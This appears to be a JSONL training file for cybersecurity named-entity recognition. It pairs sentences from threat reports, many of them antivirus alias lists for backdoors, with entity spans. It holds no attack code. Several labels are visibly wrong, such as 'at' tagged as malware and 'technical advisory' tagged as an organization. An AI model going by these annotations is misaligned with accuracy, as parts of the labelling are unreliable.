{"text": "A backdoor also known as: W32.W.Otwycal.l4av not-a-virus:NetTool.Win32.TCPScan.a Win-AppCare/Tcpscan.108750 HackTool.Win32.TCPScan.fge", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004908", "source": "cyner2_train"}}
{"text": "We have notified Google of the abuse and are working with them to share additional information.", "spans": {"ORGANIZATION: Google": [[17, 23]]}, "info": {"id": "cyner2_train_004909", "source": "cyner2_train"}}
{"text": "Here the list of the files potentially dropped during the installation stage : FILE NAME STAGE DESCRIPTION d3d9.dll Stage 4 Malware loader used for UAC environments with limited privileges ; also protected by VM obfuscation aepic.dll , sspisrv.dll , userenv.dll Stage 4 Malware loader used in presence of administrative privileges ; executed from ( and injected into ) a fake service ; also protected by VM obfuscation msvcr90.dll Stage 5 Malware payload injected into the explorer.exe or winlogon.exe process ; also protected by VM obfuscation .cab Config Main configuration file ; encrypted setup.cab Unknown Last section of the setup executable ; content still unknown .7z Plugin Malware plugin used to spy the victim network communications wsecedit.rar Stage 6 Main malware executable After writing some of these files , the malware decides which kind of installation to perform based on the current privilege provided by the hosting process ( for example , if a Microsoft Office process was used as exploit vector ) : Installation process under UAC When running under a limited UAC account , the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run .", "spans": {"SYSTEM: Microsoft Office": [[967, 983]]}, "info": {"id": "cyner2_train_004910", "source": "cyner2_train"}}
{"text": "In cooperation with Cisco Advanced Services Incident Response, Talos identified several key aspects of the attack.", "spans": {"ORGANIZATION: Cisco Advanced Services Incident Response, Talos": [[20, 68]]}, "info": {"id": "cyner2_train_004911", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.StartPage!O TrojanDownloader.Small.DF3 Trojan/Dropper.StartPage.bdz TROJ_FAVADD.SMI Win32.Trojan.WisdomEyes.16070401.9500.9719 TROJ_FAVADD.SMI Win.Downloader.134775-1 Win32.Trojan.Favadd.A Trojan.Win32.Alien.bnu Trojan.Win32.Zbot.dydfgj Trojan.Win32.Z.Startpage.69632.D Troj.Downloader.W32.VB.lkln TrojWare.Win32.Pasta.SAB Trojan.MulDrop1.43517 Dropper.StartPage.Win32.220 BehavesLike.Win32.VBObfus.km TrojanDropper.StartPage.ty Trojan[Downloader]/Win32.VB Trojan.Buzy.114 Trojan.Win32.Alien.bnu Trojan:Win32/Favadd.C Trojan/Win32.StartPage.R6041 Trojan.VBRA.06132 Trojan.DL.VB!NOyJWQLVTJg Win32/Trojan.835", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004912", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Hegel TROJ_SHIZ.SMP6 W32/Shiz.MU TROJ_SHIZ.SMP6 Trojan.Win32.A.Downloader.53760.HN Trojan.Packed.20771 BehavesLike.Win32.Cutwail.qh W32/Shiz.FQWK-1945 TrojanDownloader:Win32/Hegel.F Trojan/Win32.ADH.R23078 W32/Shiz.NCF!tr Win32/Trojan.74e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004913", "source": "cyner2_train"}}
{"text": "Android/Twitoor is a backdoor capable of downloading other malware onto an infected device. It has been active for around one month.", "spans": {"MALWARE: Android/Twitoor": [[0, 15]], "MALWARE: backdoor": [[21, 29]], "MALWARE: malware": [[59, 66]], "SYSTEM: infected device.": [[75, 91]]}, "info": {"id": "cyner2_train_004914", "source": "cyner2_train"}}
{"text": "RIG exploit kit sends Ramnit payloads via VBScript CVE-2016-0189", "spans": {"MALWARE: RIG exploit kit": [[0, 15]], "MALWARE: Ramnit payloads": [[22, 37]]}, "info": {"id": "cyner2_train_004917", "source": "cyner2_train"}}
{"text": "Angler began exploiting CVE-2015-3090 about two weeks after Adobe released a patch.", "spans": {"MALWARE: Angler": [[0, 6]], "VULNERABILITY: exploiting CVE-2015-3090": [[13, 37]], "ORGANIZATION: Adobe": [[60, 65]]}, "info": {"id": "cyner2_train_004919", "source": "cyner2_train"}}
{"text": "So let's make a level-headed assessment of what is really out there.", "spans": {}, "info": {"id": "cyner2_train_004921", "source": "cyner2_train"}}
{"text": "Three distinctive elements of BAIJIU drew and held our attention: the unusual complexity of the attack; the appropriation of web hosting service GeoCities of 1990s fame; and the use of multiple methods of obfuscation.", "spans": {"MALWARE: BAIJIU": [[30, 36]], "ORGANIZATION: GeoCities": [[145, 154]]}, "info": {"id": "cyner2_train_004923", "source": "cyner2_train"}}
{"text": "We assume that these two elements were chosen to trick security products.", "spans": {}, "info": {"id": "cyner2_train_004924", "source": "cyner2_train"}}
{"text": "The stealer is disguised as a legitimate Google Drive extension and it can monitor browsing history, capture screenshots, and inject malicious scripts to steal funds from cryptocurrency exchanges.", "spans": {"MALWARE: The stealer": [[0, 11]], "SYSTEM: legitimate Google Drive extension": [[30, 63]]}, "info": {"id": "cyner2_train_004925", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Mansabo.389120.B Win32.Trojan-Spy.Trickbot.F Trojan.Win32.Mansabo.aiu Trojan.Win32.Mansabo.evnqvj Trojan.Inject2.64433 Trojan.Mansabo.ni TR/AD.Inject.jyiec Trojan/Win32.Mansabo Trojan.Win32.Mansabo.aiu Trojan/Win32.Inject.C2278939 TScope.Trojan.VB Trojan.TrickBot Trj/GdSda.A Win32.Trojan.Mansabo.Ljab W32/Mansabo.AIU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004926", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Exploit/W32.Pidief.6283.GLW JS/Pdfcm.AQ Exploit-PDF.sd Bloodhound.Exploit.196 EXPL_EXECOD.A Pdf.Exploit.CVE_2009_0927-1 Exploit.Win32.Pidief.bni PDF.Exploit.CVE-2009-0927.A Exploit.W32.Pidief!c Trojan-Dropper:JS/PdfDropper.A EXPL_EXECOD.A BehavesLike.PDF.Exploit.xn EXP/Pidief.arl Exploit.Win32.Pidief.bni Trojan.JS.Downloader.BEZ Exploit.Win32.Pidief.bni Win32.Exploit.Pidief.Hupr Trojan.Js.Exploit virus.pdf.pdfjs.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004927", "source": "cyner2_train"}}
{"text": "All Firefox users are urged to update to Firefox 39.0.3. The fix has also been shipped in Firefox ESR 38.1.1.", "spans": {"SYSTEM: Firefox users": [[4, 17]], "SYSTEM: Firefox 39.0.3.": [[41, 56]], "SYSTEM: Firefox ESR 38.1.1.": [[90, 109]]}, "info": {"id": "cyner2_train_004928", "source": "cyner2_train"}}
{"text": "The malware documented in this post was predominantly 64-bit, however, there are 32-bit versions of the malware in the wild.", "spans": {"MALWARE: malware": [[4, 11], [104, 111]], "SYSTEM: 64-bit,": [[54, 61]], "SYSTEM: 32-bit versions": [[81, 96]]}, "info": {"id": "cyner2_train_004929", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: TrojanXor.Linux.DDos.A Linux/DDoS-Xor.A ELF/Trojan.JWZU-2 Linux.Xorddos ELF_XORDDOS.SM Unix.Trojan.DDoS_XOR-1 HEUR:Trojan-DDoS.Linux.Xarcen.a Trojan.Unix.Xarcen.eftmox Troj.Ddos.Linux!c Linux.DDoS.Xor.4 Trojan.Xorddos.Linux.34 Linux/DDoS-Xor.A TrojanDDoS.Linux.ff LINUX/Xorddos.tmifd Trojan[DDoS]/Linux.Xarcen.a Trojan.Trojan.Linux.XorDDoS.2 Linux/Xorddos.625867 HEUR:Trojan-DDoS.Linux.Xarcen.a Trojan.Linux.XorDdos.a Trojan.Linux.DDoS ELF/DDoS.BH!tr ELF/XorDDos.A Win32/Trojan.DDoS.ee7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004932", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Tibrun Trojan/Kryptik.bwcw Trojan.Razy.D3CCE1 W32/Trojan2.ODQP Trojan.Bruterdep TROJ_TIBRUN.B Trojan-Spy.Win32.POSBrut.b Trojan.Win32.Crypt.ctwfbi Troj.W32.Crypt.csx!c Trojan.DownLoader9.55744 Trojan.Crypt.Win32.14169 TROJ_TIBRUN.B Trojan.Krypt-POS W32/Trojan.WWSD-0234 Trojan/Crypt.eom TR/Spy.13824.412 Trojan/Win32.Crypt.csx Trojan:Win32/Tibrun.A Trojan-Spy.Win32.POSBrut.b Trojan/Win32.Tibrun.C287165 Trojan.Crypt Trj/CI.A Win32/Kryptik.BWCW Win32.Trojan-spy.Posbrut.Sxxp Trojan.Crypt!ZT6l9g/i+CQ W32/BrutPOS.B!tr Win32/Trojan.2d6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004933", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9846 Win32/Droplet.YK Trojan.NtRootKit.9406 TR/Horse.QWS Trj/CI.A W32/Malware_fam.NB Win32/RootKit.Rootkit.43e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004934", "source": "cyner2_train"}}
{"text": "The infection happens in multiple stages and the dropper is very similar to many common worm that targets embedded devices from multiple architectures.", "spans": {"MALWARE: dropper": [[49, 56]], "MALWARE: worm": [[88, 92]], "SYSTEM: embedded devices": [[106, 122]], "SYSTEM: multiple architectures.": [[128, 151]]}, "info": {"id": "cyner2_train_004935", "source": "cyner2_train"}}
{"text": "Yesterday, our colleagues from Symantec published their analysis of Longhorn, an advanced threat actor that can be easily compared with Regin, ProjectSauron, Equation or Duqu2 in terms of its complexity.", "spans": {"ORGANIZATION: colleagues": [[15, 25]], "ORGANIZATION: Symantec": [[31, 39]], "THREAT_ACTOR: Longhorn,": [[68, 77]], "THREAT_ACTOR: advanced threat actor": [[81, 102]], "THREAT_ACTOR: Regin, ProjectSauron, Equation": [[136, 166]], "THREAT_ACTOR: Duqu2": [[170, 175]]}, "info": {"id": "cyner2_train_004939", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Waldek.3342336 Trojan.Mauvaise.SL1 Backdoor.Trojan Trojan.Win32.Waldek.wvv Trojan.Win32.Waldek.elvbza Troj.W32.Waldek!c Trojan.Waldek.exr Trojan:Win32/Waldek.A!bit Trojan.Win32.Waldek.wvv Backdoor.Andromeda Trj/Gamarue.A Win32/Worm.5d8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004941", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.AutoRun.bo W32.SillyFDC Trojan.DownLoader8.34261 Worm:Win32/Metibh.A Rootkit.Ressdt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004942", "source": "cyner2_train"}}
{"text": "However the registrar NameCheap, Inc. covers a pool of 287.411.506 domains where at least 0.10% can be considered as potentially malicious.", "spans": {"ORGANIZATION: NameCheap, Inc.": [[22, 37]], "MALWARE: at": [[81, 83]], "MALWARE: potentially malicious.": [[117, 139]]}, "info": {"id": "cyner2_train_004945", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeWinlogonXIA.Trojan Trojan.Win32.Swisyn!O Trojan.Swisyn.Win32.25583 Trojan/Swisyn.alai Win32.Worm.VB.qn W32.SillyFDC Win32/SillyAutorun.EYX TROJ_SWISYN.AJ Trojan.Win32.Swisyn.alai Trojan.Win32.Vb.btqbl Trojan.Win32.Swisyn.36864.C Trojan.KillFiles.12035 TROJ_SWISYN.AJ Trojan/Swisyn.vmn Worm/Win32.WBNA.mjv Worm:Win32/Roopirs.A Trojan.Win32.Swisyn.alai Trojan/Win32.Swisyn.R2752 Trojan.VBRA.04943 Trojan.PoorVirus I-Worm.VB.NUV Win32/VB.NUV Trojan.Win32.Swisyn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004946", "source": "cyner2_train"}}
{"text": "A backdoor also known as: MemScan:Backdoor.Turkojan.BM Trojan.PWS.VKont!NjMVuhwtYR0 BKDR_TURKOJN.SMD Win32.Backdoor.Turko PUA.Packed.Themida-2 Packed.Win32.Black.a MemScan:Backdoor.Turkojan.BM Packed.Win32..Black.~A MemScan:Backdoor.Turkojan.BM Trojan.Packed.650 BKDR_TURKOJN.SMD Heuristic.BehavesLike.Win32.Fake.O Trojan:Win32/Turkojan.B!dll MemScan:Backdoor.Turkojan.BM Packed/Win32.Black Trojan.Win32.Nodef.dqw Trj/Thed.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004947", "source": "cyner2_train"}}
{"text": "This report analyzes a campaign of targeted attacks against an NGO working on environmental issues in Southeast Asia.", "spans": {"THREAT_ACTOR: campaign": [[23, 31]], "ORGANIZATION: NGO": [[63, 66]]}, "info": {"id": "cyner2_train_004949", "source": "cyner2_train"}}
{"text": "The developers refer to this tool by the name Kazuar, which is a Trojan written using the Microsoft .NET Framework that offers actors complete access to compromised systems targeted by its operator.", "spans": {"THREAT_ACTOR: developers": [[4, 14]], "MALWARE: tool": [[29, 33]], "MALWARE: Kazuar,": [[46, 53]], "MALWARE: Trojan": [[65, 71]], "SYSTEM: the Microsoft .NET Framework": [[86, 114]], "THREAT_ACTOR: actors": [[127, 133]], "SYSTEM: compromised systems": [[153, 172]], "THREAT_ACTOR: operator.": [[189, 198]]}, "info": {"id": "cyner2_train_004950", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BackDoor-AZF.dll BKDR_BITS.B W32/Backdoor.FPJ Backdoor.Trojan Win32/Bits.A BKDR_BITS.B Backdoor.Win32.Bits Trojan.Win32.Bits.dlhcqc Backdoor.Win32.Bits.A BackDoor.Bits Backdoor.Bits.Win32.9 BackDoor-AZF.dll W32/Backdoor.SUAV-1947 Backdoor/Bits.b Backdoor:Win32/Bits.B Backdoor.Win32.Bits Bck/Bits.A Backdoor.Bits!2M7xWD4MAec", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004951", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.B13C Trojan.Blouiroet Trojan.Win32.Blouiroet.au Trojan.Win32.Blouiroet.evaxpp Trojan.Win32.Z.Symmi.3033600 Troj.W32.Blouiroet!c Win32.Trojan.Blouiroet.Wvkk BehavesLike.Win32.Trojan.vc Trojan.Blouiroet.s Trojan.Symmi.D1371C Trojan.Win32.Blouiroet.au Trojan:Win32/Blouiroet.A Trojan/Win32.Blouiroet.C2267836 Trojan.Blouiroet Trj/CI.A Win32/Trojan.c10", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004953", "source": "cyner2_train"}}
{"text": "From a single instance of the encoded JavaScript discovered in one version of this malware, we pivoted on the Command and Control C2 IPv4 address discovered during static analysis and deobfuscation, using our Threat Intelligence Service AutoFocus, unearthed many more versions of the malware and found that the versions seen to date were delivering a credential-stealing Trojan as the final payload.", "spans": {"MALWARE: malware,": [[83, 91]], "SYSTEM: Threat Intelligence Service AutoFocus,": [[209, 247]], "MALWARE: malware": [[284, 291]], "MALWARE: a credential-stealing Trojan": [[349, 377]], "MALWARE: the final payload.": [[381, 399]]}, "info": {"id": "cyner2_train_004954", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VirTool.VBInject Trojan.Win32.Clicker!BT Trojan.Kazy.D6D077 Win32.Trojan.Trojan-Clicker.e Trojan.Win32.VB.dwztex Trojan.Win32.Z.Kazy.28676 Win32.HLLW.VBNA.based BehavesLike.Win32.Trojan.mz Trojan.Win32.TrojanClicker TrojanClicker.VB.fwe TR/Kazy.446583.222 TrojanClicker:Win32/Wimg.A Trojan.Win32.Clicker!BT TScope.Trojan.VB Trj/GdSda.A W32/TrojanClicker.OFQ!tr Win32/Trojan.de7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004956", "source": "cyner2_train"}}
{"text": "These attacks are targeted, but not spear-phished.", "spans": {}, "info": {"id": "cyner2_train_004962", "source": "cyner2_train"}}
{"text": "CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding OLE interface of Microsoft Office to deliver malware.", "spans": {"VULNERABILITY: zero-day remote code execution vulnerability that": [[31, 80]], "THREAT_ACTOR: attackers": [[89, 98]], "MALWARE: exploit": [[102, 109]], "MALWARE: the Windows Object Linking and Embedding OLE": [[132, 176]], "SYSTEM: Microsoft Office": [[190, 206]], "MALWARE: malware.": [[218, 226]]}, "info": {"id": "cyner2_train_004963", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Triosir.682 Backdoor:Win32/Rupski.A Trojan.Triosir! AdWare.AddLyrics Win32/Virus.Adware.cd5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004967", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Win32.Injecter", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004970", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanpws.Ginapass Trojan.Win32.Figina.ewevus Trojan.PWS.Figina Tool.DYAMAR.Win32.193 BehavesLike.Win32.Ransom.bc PWS:Win32/GinaPass.D Downloader.Delphi Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004973", "source": "cyner2_train"}}
{"text": "Bitdefender Labs has issued a technical advisory to warn the public about a new wave of opportunistic attacks using a vulnerability in Zoho ManageEngine servers, which could affect tens of thousands of businesses.", "spans": {"ORGANIZATION: Bitdefender Labs": [[0, 16]], "ORGANIZATION: technical advisory": [[30, 48]], "VULNERABILITY: vulnerability": [[118, 131]], "SYSTEM: Zoho ManageEngine servers,": [[135, 161]], "ORGANIZATION: businesses.": [[202, 213]]}, "info": {"id": "cyner2_train_004976", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Clicker!BT Win32.Trojan.WisdomEyes.16070401.9500.9503 Uds.Dangerousobject.Multi!c trojanclicker.msil.fakeie.a TR/Dropper.MSIL.138467 Trojan.MSIL.Krypt.2 TrojanClicker:MSIL/FakeIE.A Trojan.Win32.Clicker!BT Downloader.MSIL.ASXS Win32/Trojan.d60", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004977", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Fujacks.AB Packed.Win32.TDSS!O W32/Fujacks.s Worm.Fujack.Win32.6 W32/Fujacks.aa.2 PE_FUJACKS.EA Win32.Worm.BMW.b W32/Fujack.R W32.Fujacks.E Win32/Emerleox.CO PE_FUJACKS.EA Win.Worm.Fujack-8 Worm.Win32.Fujack.aa Win32.Worm.Fujacks.AB Trojan.Win32.Fujack.nsvf W32.W.Fujack.kZ4V Virus.Win32.Viking.a Win32.Worm.Fujacks.AB Win32.HLLP.Whboy.80 BehavesLike.Win32.MultiPlug.th W32/Fujack.R Worm/Viking.Tail TR/Drop.Hupigon.kmx Trojan[Packed]/Win32.CPEX-based Win32.WhBoy.aa.183492 Trojan:WinNT/Kangkio.A Win32.Worm.Fujacks.AB Win32.WhBoy.AJ Worm.Win32.Fujack.aa Win32.Virus.Neshta.D Win32/Dellboy.Z Win32.Worm.Fujacks.AB Win32.HLLW.Whboy RiskWare.Tool.CK Win32.Fujacks.AD Win32/Fujacks.AD Win32.HLLP.WHBoy.AP Worm.Win32.Fujack W32/BoyhW.V Virus.Win32.Viking.LB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004978", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.E05F81 Win32.HLLW.Autoruner2.27649 BehavesLike.Win32.Fake.dc Worm:Win32/Namepuk.A HEUR/Fakon.mwf Trojan.FKM!1pKOHJnJsdU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004979", "source": "cyner2_train"}}
{"text": "Open source reporting recently indicated new activity from the Iranian actor publicly known as Greenbug targeting Saudi Arabia.", "spans": {"THREAT_ACTOR: the Iranian actor": [[59, 76]], "THREAT_ACTOR: Greenbug": [[95, 103]]}, "info": {"id": "cyner2_train_004980", "source": "cyner2_train"}}
{"text": "Following on from our post on Angler EK we are going to expose the mechanics behind the Bedep ad-fraud malware.", "spans": {"MALWARE: Angler EK": [[30, 39]], "MALWARE: Bedep ad-fraud malware.": [[88, 111]]}, "info": {"id": "cyner2_train_004981", "source": "cyner2_train"}}
{"text": "The exploit files involved were identical to the Hacking Team's leaked exploit HTML, JavaScript, and ShockWave Flash 0-day files.", "spans": {"MALWARE: exploit": [[4, 11], [71, 78]], "ORGANIZATION: Hacking Team's": [[49, 63]]}, "info": {"id": "cyner2_train_004982", "source": "cyner2_train"}}
{"text": "Since then we have identified a number of attacks over a two-year period, beginning in April 2014, which we attribute to Suckfly.", "spans": {"THREAT_ACTOR: Suckfly.": [[121, 129]]}, "info": {"id": "cyner2_train_004983", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Koutodoor!O Trojan.Koutodoor.E Win32.Rootkit.Koutodoor.a Trojan.Koutodoor TROJ_DLOADR.SMOM Backdoor.Win32.Koutodoor.aihc Trojan.Win32.RKDoor.evaszd Backdoor.Win32.Koutodoor.HC Trojan.DownLoader3.76 Trojan.Koutodoor.Win32.5401 TROJ_DLOADR.SMOM Trojan.Rootkit.Pakes W32.Backdoor.Koutodoor Trojan[Backdoor]/Win32.Koutodoor Win32.Troj.JunkcodeT.a.188672 Trojan.Koutodoor.12 Backdoor.Win32.Koutodoor.aihc TrojanDropper:Win32/Minmal.A Backdoor/Win32.Koutodoor.R1785 Trojan.PSW.Win32.OnlineGame.d Trojan.Win32.Koutodoor.AN", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004984", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.MSIL Exploit.Win32.CVE20130074.eupinx W32/Trojan.QBBK-0155 Exploit.MSIL.cn EXP/CVE-2013-0074.cpsmi Exploit:MSIL/CVE-2016-0034.B Trj/GdSda.A Trojan.Win32.Exploit W32/CVE_2013_0074.GW!tr Win32/Trojan.Exploit.d89", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004985", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanSpy.VBChuchelo.bk Trojan/Spy.VBChuchelo.g Trojan-Spy.Win32.VBChuchelo TrojanSpy.VBChuchelo.G Win32/Spy.KeyLogger.NDE Trojan-Downloader.Win32.Noesis.11.B!IK W32/VBTroj.WTX Trojan.VB-7191 Trojan-Spy.Win32.VBChuchelo.g Backdoor.VB.1 TrojWare.Win32.TrojanSpy.VB.~FJ Trojan-Spy.Win32.VBChuchelo.g TrojanSpy.VBChuchelo.v Backdoor.Trojan Backdoor:Win32/Zumamumy.A Trojan.Win32.VBChuchelo.106667 Backdoor.VB.1 Win-Trojan/Vbchuchelo.106658 Trojan-Spy.Win32.VBChuchelo.g Trojan-Downloader.Win32.Noesis.11.B Dropper.Tiny Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004988", "source": "cyner2_train"}}
{"text": "The bulk of the victims were predominantly based out of Ecuador, Venezuela, Peru, Argentina, and Columbia; however, other victims were identified in Korea, the United States, the Dominican Republic, Cuba, Bolivia, Guatemala, Nicaragua, Mexico, England, Canada, Germany, Russia, and Ukraine.", "spans": {"ORGANIZATION: victims": [[16, 23], [122, 129]]}, "info": {"id": "cyner2_train_004990", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDropper.Yabinder.2.0 Trojan.DR.Yabinder!OrBzj5WtPwc Win32/Yabinder.20 W32/Yabinder.C W32.Slackor.dr Slacke.A TROJ_YABINDER.20 Trojan.Yabinder.20B TrojanDropper.Yabinder.2.0 TrojWare.Win32.Yabinder.20 TrojanDropper.Yabinder.2.0 Trojan.MulDrop.310 TR/Yabinder.20.B TROJ_YABINDER.20 Win32/TrojanRunner.Yab.200 W32/Yabinder.C TrojanDropper:Win32/Yabinder.2_0 Backdoor.Win32.Bifrose.168361 TrojanDropper.Yabinder.2.0 Dropper/Yabinder.9728 Backdoor.Win32.Bifrose.bco Malware.Slackor Trojan.Yabinder.a Trojan-Dropper.Win32.Yabinder.20 W32/Yabinder.C!tr Dropper.Yabinder.A Trj/Yabinder.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004991", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom_YUHAK.A Trojan.MulDrop7.49600 Ransom_YUHAK.A BehavesLike.Win32.PWSZbot.dh TR/RedCap.cgaww Trojan.Heur.RP.E93A3E Ransom:Win32/Wagcrypt.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004992", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE BehavesLike.Win32.Trojan.cc Trojan[Dropper]/Win32.Gluer TrojanDropper:Win32/Gluer.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004995", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DOS.Filemaker.A Trojan.DOS.Filemaker.A Filemaker.b Trojan.DOS.Filemaker Trojan.DOS.Filemaker.A TrojWare.DOS.Filemaker Trojan.DOS.Filemaker.A Trojan.Filemaker TR/Filemaker.A Filemaker.b Trojan/DOS.DOS Trojan.DOS.Filemaker.A Filemaker.A Trojan.DOS.Filemaker Malware_fam.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004996", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9985 W32/Trojan2.OWYQ Trojan.Msil W32/Trojan.FRCA-1486 Trojan.Spacekito Trojan.Zusy.D177A1 Trojan:MSIL/Spacekito.E PUP/Win32.Vittalia.R124797 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004997", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DownLoader25.42759 BehavesLike.Win32.BadFile.gh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004998", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Banker.Win32.82933 Win32.Trojan.WisdomEyes.16070401.9500.9712 Trojan.Zbot Trojan-Spy.MSIL.Banker.jc Trojan.Win32.Banker.datvyw Troj.Spy.MSIL.Banker.jc!c Trojan-Spy.MSIL.CliBanker TR/Spy.Clipug.A.11 Win32.Troj.Banker.kcloud TrojanSpy:MSIL/Clipug.A Trojan.Kazy.D5F205 Trojan-Spy.MSIL.Banker.jc Trojan/Win32.ClipBanker.C415793 Trj/Dtcontx.M Msil.Trojan-spy.Banker.Ecua Trojan.ClipBanker! MSIL/ClipBanker.A!tr Win32/Trojan.Spy.b4a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004999", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.AutoRun Worm.W32.Autorun!c Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/MalwareF.OZHN Worm.Win32.AutoRun.bhzt Trojan.Win32.DownLoad2.dfarbo Win32.Worm.Autorun.Wvuf Trojan.DownLoad2.11039 Trojan.Patched.Win32.123715 BehavesLike.Win32.Downloader.nt W32/Risk.AVZF-7617 Worm/AutoRun.yjm Trojan.Graftor.D1B4A5 Worm.Win32.AutoRun.bhzt Worm/Win32.AutoRun.C2342249 Trojan.Meredrop!NKOc3oKULjk Worm.Win32.AutoRun W32/AutoRun.BHZT!worm Trj/CI.A Win32/Trojan.e1e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005003", "source": "cyner2_train"}}
{"text": "The report analyzed the entirety of the purported attack campaign, beginning in 2009 using a family of tools dubbed Troy'.", "spans": {"THREAT_ACTOR: attack campaign,": [[50, 66]], "MALWARE: family of tools": [[93, 108]], "MALWARE: Troy'.": [[116, 122]]}, "info": {"id": "cyner2_train_005005", "source": "cyner2_train"}}
{"text": "The payload installed in attacks using this lure is a variant of the Emissary Trojan that we have analyzed in the past, which has direct links to threat actors associated with Operation Lotus Blossom.", "spans": {"MALWARE: payload": [[4, 11]], "MALWARE: the Emissary Trojan": [[65, 84]], "THREAT_ACTOR: threat actors": [[146, 159]], "THREAT_ACTOR: Operation Lotus Blossom.": [[176, 200]]}, "info": {"id": "cyner2_train_005006", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packed.Win32.TDSS!O Nettool.Ultrasurf Trojan/AutoRun.VB.axp Win32.Trojan.WisdomEyes.16070401.9500.9864 W32/Trojan4.MDT Win.Trojan.7355760-1 TrojWare.Win32.Patched.KSU Tool.UltraSurf.Win32.14 BehavesLike.Win32.FakeAlertSecurityTool.hc W32/Trojan.VIDV-4226 Win32.Troj.Undef.kcloud Trojan.Heur.VB.KieddGFnVEmi Trojan:Win32/Cossta.A Trojan/Win32.Cossta.C77631 Trojan.Dynamer!q0c68r1YFqw W32/VB.AXP!tr Trojan.VBRA.02198 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005008", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: TROJ_MINER.AUSC TROJ_MINER.AUSC JS/Coinminer.EFAB!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005013", "source": "cyner2_train"}}
